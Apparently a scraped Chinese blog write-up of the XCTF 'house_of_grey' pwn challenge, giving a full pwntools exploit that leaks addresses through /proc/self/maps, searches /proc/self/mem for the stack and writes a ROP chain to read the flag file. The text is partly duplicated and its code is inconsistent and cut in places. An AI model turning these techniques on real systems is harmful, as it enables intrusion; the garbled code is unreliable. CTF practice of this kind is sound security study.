XCTF-house_of_grey-WP

博主： chuj
发布时间：2021 年 03 月 11 日
89次浏览
暂无评论
3662字数
分类： CTF-WP

看到题目还以为是堆利用，但是实际上是文件系统中的一个小 trick。

前置的是 `/proc` 目录的知识，可以看[这篇文章](https://www.cjovi.icu/pwnreview/1070.html)

*这个知识在 hgame 中第一次碰到，可看[这篇 WP](https://www.cjovi.icu/WP/1079.html) 中的 `the_shop_of_cosmos`*

### 漏洞点

#### 任意地址写

这里的 `buf` 可以把 `v8` 溢出掉，结合

这个 `case` 可以实现任意地址写。

#### leak

结合 1 2 3 三个功能可以对除了 flag 之外的所有文件读取并输出，那么读 `/proc/self/maps` 就可以获得进程基地址和栈地址。

比较特殊的一点是 `fn` 函数通过 `clone` 新建进程执行，栈地址是在一个 `mmap` 的段中随机分配的，我们只能获得这个段的基地址

红框中是进程基地址，橙框中是 `mmap` 段的基地址。那么如何获得 `fn` 函数所使用的栈的地址呢？只能一段一段的读出来，然后查找标志值，比如我们输入的文件名 `/proc/self/mem`

```python
sh.sendlineafter("5.Exit\n",'2')#3
sh.sendlineafter("you?\n",str(stack_base))
sh.interactive()

stack_seg_now = stack_base
buf_addr = 0
for i in range(24):
    sh.sendlineafter("5.Exit\n",'3')#2
    sh.sendlineafter("to get?\n",str(100000))
    stack_content = sh.recvuntil("1.Find")
    place = stack_content.find("/proc/self/mem") 
    if(place != -1):
        buf_addr = stack_seg_now + place + 5
        break
    else:
        stack_seg_now += 100000
```

这样就可以获得栈地址了。

由于 `fn` 的退出是用 `exit` 的，所以我们需要修改一个正常 `ret` 的函数的 `ret` 地址，比如直接修改 `read` 函数的返回地址，可以通过调试得出偏移。也就是 `read_ret_addr = buf_addr - 0x5`

算出返回地址后，就可以通过之前提到的任意地址写漏洞写入 rop_chain 了。

### exp

```
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
context(os = 'linux',arch = 'amd64')

elf = ELF("./house_of_grey")
sh = remote("111.200.241.244",39538)
#sh = process("./house_of_grey-change")

sh.sendlineafter("n?\n",'y')

sh.sendlineafter("5.Exit\n",'1')#1
sh.sendlineafter("finding?\n","/proc/self/maps")#3

sh.sendlineafter("5.Exit\n",'3')#2
sh.sendlineafter("to get?\n",'4096')

sh.recvuntil('\n')
proc_base = int(sh.recvuntil("-",drop = True),base = 16)
sh.recvuntil("[heap]\n")
stack_base = int(sh.recvuntil("-",drop = True),base = 16)
sh.recvuntil("00:00 0 \n")
libc_base = int(sh.recvuntil("-",drop = True),base = 16)
log.success("proc_base:" + hex(proc_base))
log.success("libc_base:" + hex(libc_base))
log.success("stack_base:" + hex(stack_base))

sh.sendlineafter("5.Exit\n",'1')#3
payload = '/proc/self/mem'
sh.sendlineafter("finding?\n",payload)#4

sh.sendlineafter("5.Exit\n",'2')#3
sh.sendlineafter("you?\n",str(stack_base))
sh.interactive()

log.success("buf_addr:" + hex(buf_addr))
read_ret_addr = buf_addr - 0x50

sh.sendlineafter("5.Exit\n",'1')#28
payload = '/proc/self/mem'.ljust(0x18,'\x00') + p64(read_ret_addr)
sh.sendlineafter("finding?\n",payload)#5

pop_rdi_ret = proc_base + 0x1823
pop_rsi_r15_ret = proc_base + 0x1821
sh.sendlineafter("5.Exit\n",'4')#29
name_addr = read_ret_addr + 0x78
payload = p64(pop_rdi_ret) + p64(name_addr) 
payload += p64(pop_rsi_r15_ret) + p64(0) + p64(0)#mode
payload += p64(elf.symbols["open"] + proc_base)
payload += p64(pop_rdi_ret) + p64(6)#fd = 6
payload += p64(pop_rsi_r15_ret) + p64(stack_base) + p64(0)#buf
payload += p64(elf.symbols["read"] + proc_base)
payload += p64(pop_rdi_ret) + p64(stack_base)
payload += p64(elf.symbols["puts"] + proc_base)
payload += '/home/ctf/flag\x00'
sh.sendlineafter("content: \n",payload)

sh.interactive()
```

这个题目提供的程序在我的虚拟机上没法读文件，总是报非法系统调用的错误，所以一直都得打远程来测试，没法调试大概是这道题最让我头疼的点。

同时还要注意这个 exp 需要爆破，因为栈是在一个巨大的空间中随机的，24 次搜索不一定能够搜到栈。

最后修改：2021 年 03 月 11 日 07 : 59 PM

如果觉得我的文章对你有用,那听听上面我喜欢的歌吧

发表评论取消回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

HGAME2021-WEAK1-WP
评论数： 5
XCTF/BUU-babyfengshui-WP
评论数： 4
BUU-360chunqiu2017_smallest-WP
评论数： 3
第一篇博客！！！
评论数： 2
XCTF-dice_game WP
评论数： 1

hook
嗷嗷嗷，我是傻子，打扰了师傅
hook
我调试了一下，发现确实不可以。但是为什么像你的payload这...
hook
chuj师傅，我想问一下，第一次泄露栈地址的时候，为什么要先执...
Ev3r
该评论仅登录用户及评论双方可见
Ev3r
师傅，我想明白了。。。

XCTF-house_of_grey-WP

chuj • 2021 年 03 月 11 日

看到题目还以为是堆利用，但是实际上是文件系统中的一个小 trick。

前置的是 `/proc` 目录的知识，可以看[这篇文章](https://www.cjovi.icu/pwnreview/1070.html)

*这个知识在 hgame 中第一次碰到，可看[这篇 WP](https://www.cjovi.icu/WP/1079.html) 中的 `the_shop_of_cosmos`*

### 漏洞点

#### 任意地址写

这里的 `buf` 可以把 `v8` 溢出掉，结合

这个 `case` 可以实现任意地址写。

#### leak

结合 1 2 3 三个功能可以对除了 flag 之外的所有文件读取并输出，那么读 `/proc/self/maps` 就可以获得进程基地址和栈地址。

比较特殊的一点是 `fn` 函数通过 `clone` 新建进程执行，栈地址是在一个 `mmap` 的段中随机分配的，我们只能获得这个段的基地址

```python
sh.sendlineafter("5.Exit\n",'2')#3
sh.sendlineafter("you?\n",str(stack_base))
sh.interactive()

这样就可以获得栈地址了。

算出返回地址后，就可以通过之前提到的任意地址写漏洞写入 rop_chain 了。

### exp

```
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
context(os = 'linux',arch = 'amd64')

elf = ELF("./house_of_grey")
sh = remote("111.200.241.244",39538)
#sh = process("./house_of_grey-change")

sh.sendlineafter("n?\n",'y')

sh.sendlineafter("5.Exit\n",'1')#1
sh.sendlineafter("finding?\n","/proc/self/maps")#3

sh.sendlineafter("5.Exit\n",'3')#2
sh.sendlineafter("to get?\n",'4096')

sh.sendlineafter("5.Exit\n",'1')#3
payload = '/proc/self/mem'
sh.sendlineafter("finding?\n",payload)#4

sh.sendlineafter("5.Exit\n",'2')#3
sh.sendlineafter("you?\n",str(stack_base))
sh.interactive()

log.success("buf_addr:" + hex(buf_addr))
read_ret_addr = buf_addr - 0x50

sh.sendlineafter("5.Exit\n",'1')#28
payload = '/proc/self/mem'.ljust(0x18,'\x00') + p64(read_ret_addr)
sh.sendlineafter("finding?\n",payload)#5

sh.interactive()
```

这个题目提供的程序在我的虚拟机上没法读文件，总是报非法系统调用的错误，所以一直都得打远程来测试，没法调试大概是这道题最让我头疼的点。

同时还要注意这个 exp 需要爆破，因为栈是在一个巨大的空间中随机的，24 次搜索不一定能够搜到栈。

XCTF-house_of_grey-WP

发表评论取消回复

HGAME2021-WEAK1-WP

XCTF/BUU-babyfengshui-WP

BUU-360chunqiu2017_smallest-WP

第一篇博客！！！

XCTF-dice_game WP

再谈WSL——pwn的环境配置和wsl2的换源

pwn 的一点心得

KCTF-前世今生（PWN）/ASIS CTF Finals 2016 Heapstorm-WP

BUU-wustctf2020_babyfmt-WP

PWNABLE.TW-unexploitable-WP

XCTF-house_of_grey-WP

发表评论 取消回复

XCTF-house_of_grey-WP

发表评论取消回复